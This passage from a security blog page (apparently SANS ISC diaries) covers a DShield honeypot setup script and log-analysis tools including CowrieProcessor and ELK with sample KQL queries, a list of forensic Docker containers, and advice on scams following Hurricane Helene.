            Ensures the necessary directory structures for logs, backups, and PCAP data are in place, with proper permissions to secure sensitive files.
2.    Installing Required Packages 
             Installs essential tools such as tcpdump, git, and python3-pip, streamlining the log and packet capture setup.
3.    Configuring Log Rotation and Backups 
             Automatically rotates logs and stores them with password protection. PCAP files and honeypot logs are archived daily, and older backups are cleaned to save space.
4.    Automating PCAP Capture 
             Sets up tcpdump to capture network traffic, excluding predefined ports to ensure relevant data capture. The process is automated via cron jobs.
5.    Optional Tool Integration 
             The script optionally installs cowrieprocessor and JSON-Log-Country, two tools that were extremely helpful during my internship. These streamline log processing and help categorize attack data for further analysis.
6.    SCP Option for Off-Sensor Backup 
             If enabled, the script supports SCP transfers to a remote server, automating the secure transfer of backups for off-sensor storage.

Who Benefits from This?

•    ISC Handlers and Interns: This tool provides a streamlined process for post-installation setup, allowing for faster honeypot deployment and data collection.
•    Cybersecurity Professionals: This tool's time-saving features can benefit anyone interested in setting up a DShield honeypot and contributing to threat intelligence efforts.

Tool Showcase

1. CowrieProcessor

Description

CowrieProcessor is a Python tool designed to process and summarize Cowrie logs, allowing for more accessible and detailed analysis. Cowrie logs can contain overwhelming data as they track every interaction with the honeypot. CowrieProcessor condenses this data into a readable format, focusing on crucial elements like session details, IP addresses, commands entered by attackers, and malicious files downloaded during the session.

Usage and Benefits

The tool automates the parsing of Cowrie logs, providing a summary that includes key metrics such as session duration, attacker IPs, and the commands used during each attack. This is useful for quickly understanding attacker behavior without sifting through massive raw log files. With this, security teams can focus on actionable insights, such as blocking specific IPs or analyzing downloaded malware.

Screenshot Explanation

In the attached screenshot, CowrieProcessor provides a detailed view of a session from an attack on the honeypot. It shows session details, commands attempted by the attacker, and files downloaded, such as the malicious authorized_keys file. The easy-to-read output from CowrieProcessor highlights the attack flow, giving you insight into the malicious actor’s intentions.


CowrieProcessor output showing session details and malicious activities detected by the honeypot.

DShield SIEM (ELK)

Description

While DShield SIEM (ELK) is not included in the script, it is crucial in further analysis and data visualization for honeypots. ELK (Elastic Stack) enables the collection, processing, and real-time visualization of honeypot data. It provides a centralized platform to track attacker behavior, detect patterns, and generate insights through interactive dashboards.

Usage and Benefits

Using ELK, you can monitor key metrics such as the most frequent attacker IPs, session types, and the commands attackers use. ELK dashboards also provide the ability to create custom queries using Kibana Query Language (KQL), which allows you to filter logs by specific attributes like failed logins, session durations, or malicious file downloads.


ELK dashboard showing attack data, top IP addresses, session activity, and trends over time.

Screenshot Explanation

The attached screenshot shows a detailed ELK dashboard summarizing honeypot data. On the left side, the "Top 50 IP" table displays the most active attacking IPs, while the center pie charts break down the types of logs (honeypot, webhoneypot, etc.) and session activity. The bar chart on the right visualizes Cowrie activity over time, helping analysts track attack patterns. KQL can filter this data even further, focusing on specific attacks or malicious behaviors.

KQL (Kibana Query Language)

One of the standout features of ELK is the ability to leverage KQL for deep-dive investigations. For instance, if you want to search for all failed login attempts, you can use a KQL query like:
event.outcome: "login.failed"

This query will instantly filter your logs, allowing you to pinpoint where and when login attempts failed. Another useful query might be filtering by source IP to track all actions from a particular attacker:
source.ip: "45.148.10.242"

With KQL, you can quickly analyze data across large volumes of logs, making it easy to detect anomalies, potential threats, or patterns in attacker behavior.

[1] https://github.com/DShield-ISC/dshield
[2] https://github.com/iamjoshgilman/DShieldKickStarter
[3] https://github.com/jslagrew/cowrieprocessor
[4] https://github.com/justin-leibach/JSON-Log-Country
[5] https://github.com/bruneaug/DShield-SIEM
[6] https://www.elastic.co/guide/en/kibana/current/kuery-query.html
[7] https://www.sans.edu/cyber-security-programs/bachelors-degree/
-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

0 Comments

Published: 2024-10-02

Security related Docker containers

Over the last 9 months or so, I've been putting together some docker containers that I find useful in my day-to-day malware analysis and forensicating. I have been putting them up on hub.docker.com and decided, I might as well let others know they were there. In a couple of cases, I just found it easier to create a docker container than try to remember to switch in and out of a Python virtualenv. In a couple of other cases, it avoids issues I've had with conflicting version of installed packages. In every case, I'm tracking new releases so I can update my containers when new releases come out and I usually do so within a couple of days of the new release. The ones that I have up at the moment are the following:

clausing/flare-floss

clausing/capa

clausing/hayabusa

clausing/takajo

clausing/chainsaw

clausing/yara

clausing/uac

clausing/dfir-unfurl

The USAGE portion of each page should give enough info on how to run thems (and what directories to map into the container). Hopefully, some of the rest of you will find these useful.

 

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

0 Comments

Published: 2024-10-01

Hurricane Helene Aftermath - Cyber Security Awareness Month

For a few years now, October has been "National Cyber Security Awareness Month". This year, it is a good opportunity for a refresher on some scams that tend to happen around disasters like Hurricane Helene. The bigger the disaster, the more attractive it is to scammers.

Fake Donation Sites

Hurricane Katrina was the first event that triggered many fake donation websites. Since then, the number of fake donation websites has decreased somewhat, partly due to law enforcement attention and hopefully due to people becoming more aware of these scams. These scams either pretend to be a new charity/group attempting to help or impersonate an existing reputable charity. People in affected areas need help. Please only donate to groups you are familiar with and who were active before the event.

AI Social Media Posts

I believe these posts are mostly created to gain social media followers, maybe with the intent to later reel them into some scam. They often post dramatic images created with AI tools or copied from legitimate accounts. Some may just be interested in some of the monetization schemes social media and video sites are participating. Do not amplify these accounts. Strictly speaking, they are not "fake news," but legitimate news sources who go out to take pictures and gather information need exposure more than these fake accounts. Often, the fake accounts will contribute to at least exaggeration of the impact of the event and reduce, in some cases, the credibility of legitimate recovery efforts

Malware

Attackers may use the event as a pretense to trick victims into opening attachments. In the past, we have seen e-mails and websites that spread malware claiming to include videos or images of the event. These attachments turn out to be executables installing malware.

Fake Assistance Scams

In the aftermath of a disaster, organizations often provide financial aid through loans. Scammers will apply for these loans using stolen identities traded online. If it may take several months for the victim to become aware of this, they often face a request to repay the loan. Sadly, there is not much, if anything, to protect yourself from these scams. The intend of the assistance is to be quick and unburocratic and to "sort things out later". You may have to prove that someone else used your information to apply for the loan.

"Grandparent Scam"

In this scam, a caller will pretend to be a relative or close friend, asking for money. These scams have improved because they can often identify individuals in the disaster area and use them as a pretense to extort money. The caller may claim to be the individual (often they use SMS or other text messaging services), or they may claim to represent a police department or a hospital. Do not respond to any demands for money. Notify your local police department. If you are concerned, try to reach out to the agency calling you using a published number (note that Google listings can be fake). Due to the conditions in affected areas, the local authorities may be unable to respond. Your local law enforcement agency may be able to assist. They often have a published "non-emergency" number you can use instead of 911. Individuals in the affected area may not be reachable due to spotty power and cell service availability.

Final Word

Please let us know if we missed anything. A final word on some disaster preparedness items with an "IT flavor":Broken high voltage power line wire touching cable TV and phone lines.

  1. Have a plan to get out, and if you can get out: get out. You should not stay in the affected area unless you are part of the recovery effort.
  2. Cellular networks fail. Cellular networks tend to work pretty well during smaller disasters, but they need power, towers, and other infrastructure, which will fail in large-scale disasters. Satellite connectivity quickly becomes your only viable option (if you have power). If you have a phone with satellite emergency calling (for example, a recent iPhone), they offer a "demo mode" to familiarize you with the feature.
  3. If you are lucky to already have a Starlink setup, bring the antenna inside before the storm and disconnect the equipment from power to avoid spikes destroying it.
  4. Disconnect as many electric devices from outlets as possible during a power outage (or before power outages are expected). Power outages often come with power spikes and other irregular power events that can destroy sensitive electronics. Do not plug them back in until power is restored and stable.
  5. Even a downed phone or cable TV line can be energized. You may not see the high voltage line that is also down and touches the cable TV line. I took the picture on the right this weekend in my neighborhood of a high-voltage line touching the cable TV and phone line.

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

1 Comments